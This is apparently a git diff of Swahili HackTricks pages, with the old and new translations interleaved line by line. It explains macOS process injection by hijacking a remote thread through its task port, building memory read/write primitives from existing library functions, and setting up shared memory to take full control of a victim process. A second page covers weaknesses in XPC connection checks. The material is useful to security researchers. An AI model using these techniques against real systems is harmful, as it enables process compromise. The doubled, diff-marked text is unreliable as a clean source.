Kwanza, **`task_threads()`** inaitwa kwenye task port ili kupata orodha ya nyuzi kutoka kwa kazi ya mbali. Nyuzi moja inachaguliwa kwa ajili ya hijacking. Njia hii inatofautiana na mbinu za kawaida za kuingiza msimbo kwani kuunda nyuzi mpya za mbali kunakatazwa kutokana na ulinzi mpya unaozuia `thread_create_running()`.
Kudhibiti nyuzi, **`thread_suspend()`** inaitwa, ikisimamisha utekelezaji wake.
Ili kudhibiti nyuzi, **`thread_suspend()`** inaitwa, ikisimamisha utekelezaji wake.
Operesheni pekee zinazoruhusiwa kwenye nyuzi ya mbali ni **kusimamisha** na **kuanza** nyuzi hiyo, **kupata** na **kubadilisha** thamani za usajili wake. Wito wa kazi za mbali huanzishwa kwa kuweka usajili `x0` hadi `x7` kama **hoja**, kusanidi **`pc`** kuelekea kazi inayotakiwa, na kuamsha nyuzi. Kuhakikisha nyuzi haipati ajali baada ya kurudi kunahitaji kugundua kurudi.
Operesheni pekee zinazoruhusiwa kwenye nyuzi ya mbali zinahusisha **kusimamisha** na **kuanzisha** hiyo, **kupata** na **kubadilisha** thamani zake za register. Kuitwa kwa kazi za mbali kunaanzishwa kwa kuweka register `x0` hadi `x7` kwa **hoja**, kuunda **`pc`** ili kuelekeza kwenye kazi inayotakiwa, na kuanzisha nyuzi. Kuhakikisha kuwa nyuzi haiporomoki baada ya kurudi kunahitaji kugundua kurudi.
Mbinu moja inahusisha **kujiandikisha kwa mchakato wa kipekee** kwa nyuzi ya mbali kwa kutumia `thread_set_exception_ports()`, kuweka usajili wa `lr` kwa anwani batili kabla ya wito wa kazi. Hii inasababisha kuzuka kwa kipekee baada ya utekelezaji wa kazi, kutuma ujumbe kwenye bandari ya kipekee, kuruhusu ukaguzi wa hali ya nyuzi kupona thamani ya kurudi. Kwa njia nyingine, kama ilivyochukuliwa kutoka kwa udanganyifu wa triple\_fetch wa Ian Beer, `lr` inawekwa kwenye mzunguko usio na mwisho. Usajili wa nyuzi basi unafuatiliwa mara kwa mara hadi **`pc` inapoelekeza kwenye maagizo hayo**.
Stratejia moja inahusisha **kujiandikisha kwa mhandisi wa makosa** kwa nyuzi ya mbali kwa kutumia `thread_set_exception_ports()`, kuweka register `lr` kwenye anwani isiyo sahihi kabla ya wito wa kazi. Hii inasababisha makosa baada ya utekelezaji wa kazi, ikituma ujumbe kwenye bandari ya makosa, ikiruhusu ukaguzi wa hali ya nyuzi ili kurejesha thamani ya kurudi. Vinginevyo, kama ilivyopitishwa kutoka kwa exploit ya triple_fetch ya Ian Beer, `lr` inawekwa ili kuzunguka bila kikomo. Registers za nyuzi kisha zinaangaliwa kwa karibu hadi **`pc` inapoelekeza kwenye hiyo amri**.
## 2. Mach ports kwa mawasiliano
## 2. Mach ports for communication
Hatua inayofuata inahusisha kuanzisha Mach ports ili kurahisisha mawasiliano na nyuzi ya mbali. Bandari hizi ni muhimu katika kuhamisha haki za kutuma na kupokea za kiholela kati ya kazi.
Awamu inayofuata inahusisha kuanzisha Mach ports ili kuwezesha mawasiliano na nyuzi ya mbali. Bandari hizi ni muhimu katika kuhamasisha haki za kutuma na kupokea zisizo na mipaka kati ya kazi.
Kwa mawasiliano ya pande mbili, haki mbili za kupokea za Mach zinaundwa: moja katika kazi ya ndani na nyingine katika kazi ya mbali. Baadaye, haki ya kutuma kwa kila bandari inahamishiwa kwa kazi mwenza, kuruhusu kubadilishana ujumbe.
Kwa mawasiliano ya pande mbili, haki mbili za kupokea Mach zinaundwa: moja katika kazi ya ndani na nyingine katika kazi ya mbali. Kisha, haki ya kutuma kwa kila bandari inahamishwa kwa kazi ya mwenzake, ikiruhusu kubadilishana ujumbe.
Kuzingatia bandari ya ndani, haki ya kupokea inashikiliwa na kazi ya ndani. Bandari inaundwa na `mach_port_allocate()`. Changamoto inapatikana katika kuhamisha haki ya kutuma kwa bandari hii kwenda kwa kazi ya mbali.
Kuzingatia bandari ya ndani, haki ya kupokea inashikiliwa na kazi ya ndani. Bandari inaundwa kwa `mach_port_allocate()`. Changamoto iko katika kuhamasisha haki ya kutuma kwa bandari hii kwenye kazi ya mbali.
Mbinu inahusisha kutumia `thread_set_special_port()` kuweka haki ya kutuma kwa bandari ya ndani kwenye `THREAD_KERNEL_PORT` ya nyuzi ya mbali. Kisha, nyuzi ya mbali inaagizwa kuita `mach_thread_self()` ili kupata haki ya kutuma.
Stratejia inahusisha kutumia `thread_set_special_port()` kuweka haki ya kutuma kwa bandari ya ndani katika `THREAD_KERNEL_PORT` ya nyuzi ya mbali. Kisha, nyuzi ya mbali inaelekezwa kuita `mach_thread_self()` ili kupata haki ya kutuma.
Kwa bandari ya mbali, mchakato ni kinyume kabisa. Nyuzi ya mbali inaelekezwa kuzalisha bandari ya Mach kupitia `mach_reply_port()` (kwa kuwa `mach_port_allocate()` haifai kutokana na utaratibu wake wa kurudi). Baada ya kuundwa kwa bandari, `mach_port_insert_right()` inaitwa kwenye nyuzi ya mbali kuweka haki ya kutuma. Haki hii kisha inawekwa kwenye kernel kwa kutumia `thread_set_special_port()`. Kurudi kwenye kazi ya ndani, `thread_get_special_port()` inatumika kwenye nyuzi ya mbali kupata haki ya kutuma kwa bandari ya Mach iliyotengwa hivi karibuni kwenye kazi ya mbali.
Kwa bandari ya mbali, mchakato kimsingi unarudiwa. Nyuzi ya mbali inaelekezwa kuunda bandari ya Mach kupitia `mach_reply_port()` (kama `mach_port_allocate()` haiwezi kutumika kutokana na mfumo wake wa kurudi). Baada ya kuundwa kwa bandari, `mach_port_insert_right()` inaitwa katika nyuzi ya mbali ili kuanzisha haki ya kutuma. Haki hii kisha inahifadhiwa kwenye kernel kwa kutumia `thread_set_special_port()`. Kurudi kwenye kazi ya ndani, `thread_get_special_port()` inatumika kwenye nyuzi ya mbali ili kupata haki ya kutuma kwa bandari mpya ya Mach iliyotolewa katika kazi ya mbali.
Kukamilika kwa hatua hizi kunasababisha kuanzishwa kwa Mach ports, kuweka msingi wa mawasiliano ya pande mbili.
## 3. Misingi ya Kusoma/Kuandika Kumbukumbu
## 3. Basic Memory Read/Write Primitives
Katika sehemu hii, lengo ni kutumia mbinu ya kutekeleza kusoma na kuandika kumbukumbu za msingi. Hatua hizi za awali ni muhimu kwa kupata udhibiti zaidi juu ya mchakato wa mbali, ingawa misingi katika hatua hii haitumiki kwa madhumuni mengi. Hivi karibuni, zitaboreshwa kuwa toleo la juu zaidi.
Katika sehemu hii, lengo ni kutumia primitive ya kutekeleza ili kuanzisha primitive za msingi za kusoma na kuandika kumbukumbu. Hatua hizi za awali ni muhimu kwa kupata udhibiti zaidi juu ya mchakato wa mbali, ingawa primitive katika hatua hii hazitakuwa na matumizi mengi. Hivi karibuni, zitaimarishwa kuwa toleo za juu zaidi.
### Kusoma na Kuandika Kumbukumbu Kwa Kutumia Mbinu ya Kutekeleza
### Memory Reading and Writing Using Execute Primitive
Lengo ni kusoma na kuandika kumbukumbu kwa kutumia kazi maalum. Kwa kusoma kumbukumbu, hutumiwa kazi zinazofanana na muundo ufuatao:
Lengo ni kufanya kusoma na kuandika kumbukumbu kwa kutumia kazi maalum. Kwa kusoma kumbukumbu, kazi zinazofanana na muundo ufuatao zinatumika:
```c
uint64_t read_func(uint64_t *address) {
return *address;
}
```
Na kwa kuandika kwenye kumbukumbu, hutumiwa kazi zinazofanana na muundo huu:
Na kwa kuandika kwenye kumbukumbu, kazi zinazofanana na muundo huu hutumiwa:
```c
void write_func(uint64_t *address, uint64_t value) {
*address = value;
}
```
Hizi kazi zinafanana na maagizo ya mkutano yaliyotolewa:
Hizi kazi zinahusiana na maagizo ya mkusanyiko yaliyotolewa:
```
_read_func:
ldr x0, [x0]
@ -73,108 +74,108 @@ ret
```
### Kutambua Kazi Zinazofaa
Uchunguzi wa maktaba za kawaida ulifunua wagombea sahihi kwa shughuli hizi:
Kuchunguza maktaba za kawaida kumefichua wagombea wanaofaa kwa ajili ya operesheni hizi:
1. **Kusoma Kumbukumbu:**
Kazi ya `property_getName()` kutoka [Maktaba ya Objective-C runtime](https://opensource.apple.com/source/objc4/objc4-723/runtime/objc-runtime-new.mm.auto.html) imebainishwa kuwa kazi inayofaa kwa kusoma kumbukumbu. Kazi hiyo imefafanuliwa hapa chini:
Funguo la `property_getName()` kutoka kwenye [maktaba ya wakati wa Objective-C](https://opensource.apple.com/source/objc4/objc4-723/runtime/objc-runtime-new.mm.auto.html) linatambuliwa kama kazi inayofaa kwa kusoma kumbukumbu. Kazi hiyo imeelezwa hapa chini:
```c
const char *property_getName(objc_property_t prop) {
return prop->name;
}
```
Hii kazi inafanya kazi kama `read_func` kwa kurudisha uga wa kwanza wa `objc_property_t`.
Hii kazi inafanya kazi kama `read_func` kwa kurudisha uwanja wa kwanza wa `objc_property_t`.
2. **Kuandika Kumbukumbu:**
Kupata kazi iliyotengenezwa tayari ya kuandika kumbukumbu ni changamoto zaidi. Walakini, kazi ya `_xpc_int64_set_value()` kutoka kwa libxpc ni mgombea mzuri na disassembly ifuatayo:
Kupata kazi iliyojengwa awali ya kuandika kumbukumbu ni changamoto zaidi. Hata hivyo, kazi ya `_xpc_int64_set_value()` kutoka libxpc ni mgombea mzuri ikiwa na disassembly ifuatayo:
```c
__xpc_int64_set_value:
str x1, [x0, #0x18]
ret
```
Kufanya uandishi wa biti 64 kwenye anwani maalum, wito wa mbali unajengwa kama ifuatavyo:
Ili kufanya kuandika 64-bit katika anwani maalum, wito wa mbali umeundwa kama:
```c
_xpc_int64_set_value(address - 0x18, value)
```
Kwa kutumia msingi huu, hatua zimeandaliwa kwa ajili ya kuunda kumbukumbu ya pamoja, ambayo ni hatua muhimu katika kudhibiti mchakato wa mbali.
With these primitives established, the stage is set for creating shared memory, marking a significant progression in controlling the remote process.
## 4. Kuweka Kumbukumbu ya Pamoja
## 4. Usanidi wa Kumbukumbu ya Pamoja
Lengo ni kuweka kumbukumbu ya pamoja kati ya kazi za ndani na za mbali, kurahisisha uhamishaji wa data na kurahisisha wito wa kazi zenye hoja nyingi. Njia inahusisha kutumia `libxpc` na aina yake ya kitu cha `OS_xpc_shmem`, ambayo imejengwa kwenye kuingia kumbukumbu ya Mach.
Lengo ni kuanzisha kumbukumbu ya pamoja kati ya kazi za ndani na za mbali, kuifanya iwe rahisi kuhamasisha data na kuwezesha wito wa kazi zenye hoja nyingi. Njia hii inahusisha kutumia `libxpc` na aina ya kitu chake `OS_xpc_shmem`, ambayo imejengwa juu ya entries za kumbukumbu za Mach.
### Muhtasari wa Mchakato:
### Muonekano wa Mchakato:
1. **Ugawaji wa Kumbukumbu**:
- Gawa kumbukumbu kwa ajili ya kushiriki kwa kutumia `mach_vm_allocate()`.
- Tumia `xpc_shmem_create()` kuunda kitu cha `OS_xpc_shmem` kwa eneo la kumbukumbu iliyotengwa. Kazi hii itasimamia uundaji wa kuingia kumbukumbu ya Mach na kuhifadhi haki ya kutuma ya Mach kwenye nafasi ya `0x18` ya kitu cha `OS_xpc_shmem`.
- Panga kumbukumbu kwa ajili ya kushiriki kwa kutumia `mach_vm_allocate()`.
- Tumia `xpc_shmem_create()` kuunda kitu cha `OS_xpc_shmem` kwa ajili ya eneo la kumbukumbu lililotengwa. Kazi hii itasimamia uundaji wa entry ya kumbukumbu ya Mach na kuhifadhi haki ya kutuma ya Mach kwenye offset `0x18` ya kitu cha `OS_xpc_shmem`.
2. **Kuunda Kumbukumbu ya Pamoja katika Mchakato wa Mbali**:
- Gawa kumbukumbu kwa ajili ya kitu cha `OS_xpc_shmem` katika mchakato wa mbali kwa kutumia wito wa mbali kwa `malloc()`.
- Nakili maudhui ya kitu cha `OS_xpc_shmem` cha ndani kwenda kwenye mchakato wa mbali. Hata hivyo, nakala hii ya awali itakuwa na majina ya kuingia kumbukumbu ya Mach yasiyofaa kwenye nafasi ya `0x18`.
- Panga kumbukumbu kwa ajili ya kitu cha `OS_xpc_shmem` katika mchakato wa mbali kwa wito wa mbali kwa `malloc()`.
- Nakili maudhui ya kitu cha ndani cha `OS_xpc_shmem` kwenye mchakato wa mbali. Hata hivyo, nakala hii ya awali itakuwa na majina yasiyo sahihi ya entry za kumbukumbu za Mach kwenye offset `0x18`.
3. **Kurekebisha Kuingia Kumbukumbu ya Mach**:
- Tumia njia ya `thread_set_special_port()` kuweka haki ya kutuma ya kuingia kumbukumbu ya Mach kwenye kazi ya mbali.
- Rekebisha uga wa kuingia kumbukumbu ya Mach kwenye nafasi ya `0x18` kwa kuandika juu yake jina la kuingia kumbukumbu ya mbali.
3. **Kurekebisha Entry ya Kumbukumbu ya Mach**:
- Tumia njia ya `thread_set_special_port()` kuingiza haki ya kutuma kwa entry ya kumbukumbu ya Mach kwenye kazi ya mbali.
- Rekebisha uwanja wa entry ya kumbukumbu ya Mach kwenye offset `0x18` kwa kuandika upya kwa jina la entry ya kumbukumbu ya mbali.
4. **Kukamilisha Kuweka Kumbukumbu ya Pamoja**:
- Thibitisha kitu cha `OS_xpc_shmem` cha mbali.
- Weka ramani ya kumbukumbu ya pamoja kwa kutumia wito wa mbali kwa `xpc_shmem_remote()`.
4. **Kumaliza Usanidi wa Kumbukumbu ya Pamoja**:
- Thibitisha kitu cha mbali cha `OS_xpc_shmem`.
- Kuanzisha ramani ya kumbukumbu ya pamoja kwa wito wa mbali kwa `xpc_shmem_remote()`.
Kwa kufuata hatua hizi, kumbukumbu ya pamoja kati ya kazi za ndani na za mbali itawekwa kwa ufanisi, kuruhusu uhamishaji wa data kwa urahisi na utekelezaji wa kazi zinazohitaji hoja nyingi.
Kwa kufuata hatua hizi, kumbukumbu ya pamoja kati ya kazi za ndani na za mbali itakuwa imewekwa kwa ufanisi, ikiruhusu uhamasishaji wa data rahisi na utekelezaji wa kazi zinazohitaji hoja nyingi.
## Vifungu vingine vya Kanuni
## Mifano ya Kode za Ziada
Kwa ugawaji wa kumbukumbu na uundaji wa kitu cha kumbukumbu ya pamoja:
```c
mach_vm_allocate();
xpc_shmem_create();
```
Kwa kujenga na kusahihisha kifaa cha kumbukumbu kinachoshiriki katika mchakato wa mbali:
Ili kuunda na kurekebisha kitu cha kumbukumbu kilichoshirikiwa katika mchakato wa mbali:
```c
malloc(); // for allocating memory remotely
thread_set_special_port(); // for inserting send right
```
Kumbuka kushughulikia maelezo ya Mach ports na majina ya kumbukumbu kwa usahihi ili kuhakikisha kuwa usanidi wa kumbukumbu ulioshiriki unafanya kazi vizuri.
Kumbuka kushughulikia maelezo ya Mach ports na majina ya kuingia kwenye kumbukumbu kwa usahihi ili kuhakikisha kuwa usanidi wa kumbukumbu iliyoshirikiwa unafanya kazi ipasavyo.
## 5. Kufikia Udhibiti Kamili
Baada ya kuanzisha kumbukumbu iliyoshiriki na kupata uwezo wa kutekeleza kwa hiari, kimsingi tumepata udhibiti kamili juu ya mchakato wa lengo. Kazi muhimu zinazoruhusu udhibiti huu ni:
Baada ya kufanikiwa kuanzisha kumbukumbu iliyoshirikiwa na kupata uwezo wa kutekeleza kwa njia isiyo na mipaka, kimsingi tumepata udhibiti kamili juu ya mchakato wa lengo. Kazi muhimu zinazowezesha udhibiti huu ni:
1. **Operesheni za Kumbukumbu za Hiari**:
- Fanya kusoma kumbukumbu za hiari kwa kuita `memcpy()` ili kunakili data kutoka eneo lililoshirikiwa.
- Tekeleza kuandika kumbukumbu za hiari kwa kutumia `memcpy()` kuhamisha data kwenye eneo lililoshirikiwa.
1. **Operesheni za Kumbukumbu zisizo na mipaka**:
- Fanya usomaji wa kumbukumbu zisizo na mipaka kwa kuita `memcpy()` ili nakala data kutoka kwenye eneo lililosharikiwa.
- Tekeleza uandishi wa kumbukumbu zisizo na mipaka kwa kutumia `memcpy()` kuhamasisha data kwenye eneo lililosharikiwa.
2. **Kushughulikia Wito wa Kazi na Vigezo Vingi**:
- Kwa kazi zinazohitaji zaidi ya vigezo 8, panga vigezo ziada kwenye steki kulingana na mkataba wa wito.
2. **Kushughulikia Kuitwa kwa Kazi zenye Hoja Nyingi**:
- Kwa kazi zinazohitaji zaidi ya hoja 8, panga hoja za ziada kwenye stack kwa kufuata kanuni ya kuita.
3. **Uhamisho wa Mach Port**:
- Hamisha Mach ports kati ya kazi kupitia ujumbe wa Mach kupitia bandari zilizowekwa hapo awali.
- Hamisha Mach ports kati ya kazi kupitia ujumbe wa Mach kupitia bandari zilizowekwa awali.
4. **Uhamisho wa Descripta ya Faili**:
- Hamisha descripta za faili kati ya michakato kwa kutumia fileports, mbinu iliyobainishwa na Ian Beer katika `triple_fetch`.
4. **Uhamisho wa File Descriptor**:
- Hamisha file descriptors kati ya michakato kwa kutumia fileports, mbinu iliyosisitizwa na Ian Beer katika `triple_fetch`.
Udhibiti kamili huu umefungwa ndani ya maktaba ya [threadexec](https://github.com/bazad/threadexec), ikitoa utekelezaji wa kina na kiolesura cha mtumiaji rafiki kwa mwingiliano na mchakato wa mwathirika.
Udhibiti huu wa kina umejumuishwa ndani ya maktaba ya [threadexec](https://github.com/bazad/threadexec), ikitoa utekelezaji wa kina na API rafiki kwa mtumiaji kwa mwingiliano na mchakato wa mwathirika.
## Mambo Muhimu ya Kuzingatia:
## Maelezo Muhimu:
- Hakikisha matumizi sahihi ya `memcpy()` kwa operesheni za kusoma/kuandika kumbukumbu ili kudumisha utulivu wa mfumo na usahihi wa data.
- Wakati wa kuhamisha Mach ports au descripta za faili, fuata itifaki sahihi na shughulikia rasilimali kwa uwajibikaji ili kuzuia uvujaji au ufikiaji usiokusudiwa.
- Hakikisha matumizi sahihi ya `memcpy()` kwa operesheni za kusoma/kandika kumbukumbu ili kudumisha utulivu wa mfumo na uadilifu wa data.
- Unapohamisha Mach ports au file descriptors, fuata itifaki sahihi na shughuikia rasilimali kwa uwajibikaji ili kuzuia leaks au ufikiaji usio na mpango.
Kwa kufuata mwongozo huu na kutumia maktaba ya `threadexec`, mtu anaweza kusimamia na kuingiliana na michakato kwa kiwango cha kina, kufikia udhibiti kamili juu ya mchakato wa lengo.
Kwa kufuata miongozo hii na kutumia maktaba ya `threadexec`, mtu anaweza kudhibiti kwa ufanisi na kuingiliana na michakato kwa kiwango kidogo, akipata udhibiti kamili juu ya mchakato wa lengo.
## Marejeo
* [https://bazad.github.io/2018/10/bypassing-platform-binary-task-threads/](https://bazad.github.io/2018/10/bypassing-platform-binary-task-threads/)
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako inatangazwa kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi wa PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au **kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PR kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}

88
macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-connecting-process-check/README.md
View file

@ -1,60 +1,61 @@
# Uthibitisho wa Uunganishaji wa Mchakato wa macOS XPC
# macOS XPC Connecting Process Check
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako inayotangazwa katika HackTricks** au **kupakua HackTricks katika PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PR kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
## Uthibitisho wa Uunganishaji wa Mchakato wa XPC
## XPC Connecting Process Check
Wakati uunganishaji unafanywa kwa huduma ya XPC, seva itathibitisha ikiwa uunganishaji huo unaruhusiwa. Hizi ni uthibitisho ambao kawaida hufanywa:
Wakati muunganisho unapoanzishwa na huduma ya XPC, seva itakagua ikiwa muunganisho unaruhusiwa. Hizi ndizo ukaguzi ambao kawaida hufanywa:
1. Angalia ikiwa **mchakato unaounganisha umesainiwa na cheti kilichosainiwa na Apple** (kinachotolewa tu na Apple).
* Ikiwa hii **haitathibitishwa**, mshambuliaji anaweza kuunda **cheti bandia** ili kufanana na uthibitisho mwingine wowote.
2. Angalia ikiwa mchakato unaounganisha umesainiwa na **cheti cha shirika** (uthibitisho wa kitambulisho cha timu).
* Ikiwa hii **haitathibitishwa**, **cheti chochote cha maendeleo** kutoka Apple kinaweza kutumika kwa kusaini na kuunganisha na huduma.
3. Angalia ikiwa mchakato unaounganisha una **kitambulisho sahihi cha kifurushi**.
* Ikiwa hii **haitathibitishwa**, zana yoyote **iliyosainiwa na shirika lile lile** inaweza kutumika kwa kuingiliana na huduma ya XPC.
1. Angalia ikiwa **mchakato unaounganisha umeandikwa na cheti kilichosainiwa na Apple** (ambacho kinatolewa tu na Apple).
* Ikiwa hii **haijathibitishwa**, mshambuliaji anaweza kuunda **cheti bandia** ili kufanana na ukaguzi mwingine wowote.
2. Angalia ikiwa mchakato unaounganisha umeandikwa na **cheti cha shirika**, (uthibitisho wa kitambulisho cha timu).
* Ikiwa hii **haijathibitishwa**, **cheti chochote cha mende** kutoka Apple kinaweza kutumika kwa kusaini, na kuungana na huduma.
3. Angalia ikiwa mchakato unaounganisha **una kitambulisho sahihi cha kifurushi**.
* Ikiwa hii **haijathibitishwa**, chombo chochote **kilichosainiwa na shirika hilo hilo** kinaweza kutumika kuingiliana na huduma ya XPC.
4. (4 au 5) Angalia ikiwa mchakato unaounganisha una **nambari sahihi ya toleo la programu**.
* Ikiwa hii **haitathibitishwa**, wateja wazee na dhaifu, walio hatarini kwa kuingiza mchakato, wanaweza kutumika kuunganisha na huduma ya XPC hata na uthibitisho mwingine uliopo.
5. (4 au 5) Angalia ikiwa mchakato unaounganisha una **runtime imara bila ruhusa hatari** (kama zile zinazoruhusu kupakia maktaba za aina yoyote au kutumia mazingira ya DYLD)
1. Ikiwa hii **haitathibitishwa**, mteja anaweza kuwa **hatarini kwa kuingiza nambari**
6. Angalia ikiwa mchakato unaounganisha una **ruhusa** inayoruhusu kuunganisha na huduma. Hii inatumika kwa programu za Apple.
7. **Uthibitisho** lazima uwe **kulingana** na **kitambulisho cha ukaguzi cha mteja kinachounganisha** badala ya Kitambulisho cha Mchakato (**PID**) kwani cha kwanza kinazuia mashambulizi ya kutumia tena PID.
* Watengenezaji **mara chache hutumia wito wa API ya kitambulisho cha ukaguzi** kwani ni **binafsi**, kwa hivyo Apple inaweza **kubadilisha** wakati wowote. Kwa kuongezea, matumizi ya API binafsi hayaruhusiwi katika programu za Duka la App la Mac.
* Ikiwa njia ya **`processIdentifier`** inatumika, inaweza kuwa hatarini
* Badala ya **`xpc_connection_get_audit_token`**, inapaswa kutumika **`xpc_dictionary_get_audit_token`**, kwani ya mwisho inaweza pia kuwa [hatarini katika hali fulani](https://sector7.computest.nl/post/2023-10-xpc-audit-token-spoofing/).
* Ikiwa hii **haijathibitishwa**, wateja wa zamani, wasio salama, walio hatarini kwa sindano ya mchakato wanaweza kutumika kuungana na huduma ya XPC hata na ukaguzi mwingine ukiwa mahali.
5. (4 au 5) Angalia ikiwa mchakato unaounganisha una mazingira ya runtime yaliyohakikishwa bila ruhusa hatari (kama zile zinazoruhusu kupakia maktaba za kawaida au kutumia DYLD env vars)
1. Ikiwa hii **haijathibitishwa**, mteja anaweza kuwa **hatari kwa sindano ya msimbo**
6. Angalia ikiwa mchakato unaounganisha una **ruhusa** inayoruhusu kuungana na huduma. Hii inatumika kwa binaries za Apple.
7. **Uthibitisho** lazima uwe **kulingana** na **tokeni ya ukaguzi ya mteja** **badala** ya kitambulisho chake cha mchakato (**PID**) kwani ya kwanza inazuia **shambulio la upya la PID**.
* Wandevu **hawatumii mara kwa mara tokeni ya ukaguzi** API wito kwani ni **binafsi**, hivyo Apple inaweza **kubadilisha** wakati wowote. Zaidi ya hayo, matumizi ya API binafsi hayaruhusiwi katika programu za Duka la Mac.
* Ikiwa njia **`processIdentifier`** inatumika, inaweza kuwa hatari
* **`xpc_dictionary_get_audit_token`** inapaswa kutumika badala ya **`xpc_connection_get_audit_token`**, kwani ya mwisho inaweza pia kuwa [hatari katika hali fulani](https://sector7.computest.nl/post/2023-10-xpc-audit-token-spoofing/).
### Mashambulizi ya Mawasiliano
### Communication Attacks
Kwa habari zaidi kuhusu shambulio la kutumia tena PID angalia:
Kwa maelezo zaidi kuhusu shambulio la upya la PID angalia:
{% content-ref url="macos-pid-reuse.md" %}
[macos-pid-reuse.md](macos-pid-reuse.md)
{% endcontent-ref %}
Kwa habari zaidi kuhusu shambulio la **`xpc_connection_get_audit_token`** angalia:
Kwa maelezo zaidi **`xpc_connection_get_audit_token`** shambulio angalia:
{% content-ref url="macos-xpc_connection_get_audit_token-attack.md" %}
[macos-xpc\_connection\_get\_audit\_token-attack.md](macos-xpc\_connection\_get\_audit\_token-attack.md)
{% endcontent-ref %}
### Kuzuia Mashambulizi ya Kupunguza - Trustcache
### Trustcache - Downgrade Attacks Prevention
Trustcache ni njia ya ulinzi iliyoletwa kwenye mashine za Apple Silicon ambayo inahifadhi kwenye hifadhidata CDHSAH ya programu za Apple ili tu programu zisizobadilishwa zinazoruhusiwa ziweze kutekelezwa. Hii inazuia utekelezaji wa toleo za kupunguza.
Trustcache ni njia ya kujihami iliyowekwa katika mashine za Apple Silicon ambayo inahifadhi hifadhidata ya CDHSAH ya binaries za Apple ili tu binaries zisizobadilishwa zinazoruhusiwa ziweze kutekelezwa. Hii inazuia utekelezaji wa toleo la kudharau.
### Mifano ya Nambari
### Code Examples
Seva itatekeleza uthibitisho huu katika kazi inayoitwa **`shouldAcceptNewConnection`**.
Seva itatekeleza **uthibitisho** huu katika kazi inayoitwa **`shouldAcceptNewConnection`**.
{% code overflow="wrap" %}
```objectivec
@ -65,9 +66,9 @@ return YES;
```
{% endcode %}
Kitu NSXPCConnection ina mali ya **binafsi** **`auditToken`** (ile inayopaswa kutumika lakini inaweza kubadilika) na mali ya **umma** **`processIdentifier`** (ile ambayo haipaswi kutumika).
Kitu NSXPCConnection kina mali **ya faragha** **`auditToken`** (ile ambayo inapaswa kutumika lakini inaweza kubadilika) na mali **ya umma** **`processIdentifier`** (ile ambayo haipaswi kutumika).
Mchakato wa kuunganisha unaweza kuthibitishwa kwa kitu kama hiki:
Mchakato unaounganisha unaweza kuthibitishwa kwa kitu kama:
{% code overflow="wrap" %}
```objectivec
